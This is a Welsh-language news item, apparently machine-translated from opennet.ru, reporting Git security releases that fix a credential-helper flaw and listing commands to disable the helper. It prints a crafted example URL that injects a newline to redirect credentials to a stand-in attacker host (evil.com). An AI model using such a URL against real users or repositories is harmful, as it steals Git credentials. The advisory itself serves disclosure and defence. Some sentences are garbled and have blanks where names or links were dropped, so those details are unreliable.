datganiadau cywirol o'r system rheoli ffynhonnell ddosbarthedig Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 a 2.17.4, yn sy'n dileu () yn y triniwr"", sy'n achosi i fanylion gael eu hanfon i'r gwesteiwr anghywir pan fydd cleient git yn cyrchu ystorfa gan ddefnyddio URL wedi'i fformatio'n arbennig sy'n cynnwys nod llinell newydd. Gellir defnyddio'r bregusrwydd i drefnu bod tystlythyrau gan westeiwr arall yn cael eu hanfon at weinydd a reolir gan yr ymosodwr.
Wrth nodi URL fel “https://evil.com?%0ahost=github.com/”, bydd y triniwr credential wrth gysylltu â'r host.com yn pasio'r paramedrau dilysu a nodir ar gyfer github.com. Mae'r broblem yn digwydd wrth berfformio gweithrediadau megis "git clone", gan gynnwys prosesu URLs ar gyfer is-fodiwlau (er enghraifft, bydd "git submodule update" yn prosesu'r URLau a nodir yn y ffeil .gitmodules o'r ystorfa yn awtomatig). Mae'r bregusrwydd yn fwyaf peryglus mewn sefyllfaoedd lle mae datblygwr yn clonio ystorfa heb weld yr URL, er enghraifft, wrth weithio gydag is-fodiwlau, neu mewn systemau sy'n cyflawni gweithredoedd awtomatig, er enghraifft, mewn sgriptiau adeiladu pecynnau.
I rwystro gwendidau mewn fersiynau newydd pasio cymeriad newline mewn unrhyw werthoedd a drosglwyddir trwy'r protocol cyfnewid credential. Ar gyfer dosbarthiadau, gallwch olrhain rhyddhau diweddariadau pecyn ar y tudalennau , , , , , , .
Fel ateb i atal y broblem Peidiwch â defnyddio credential.helper wrth gael mynediad i gadwrfeydd cyhoeddus a pheidiwch â defnyddio "git clone" yn y modd "--recurse-submodules" gyda storfeydd heb eu gwirio. I analluogi'r triniwr credential.helper yn llwyr, sy'n gwneud hynny ac adalw cyfrineiriau o , gwarchodedig neu ffeil gyda chyfrineiriau, gallwch ddefnyddio'r gorchmynion:
config git --unset credential.helper
config git --global --unset credential.helper
config git --system --unset credential.helper
Ffynhonnell: opennet.ru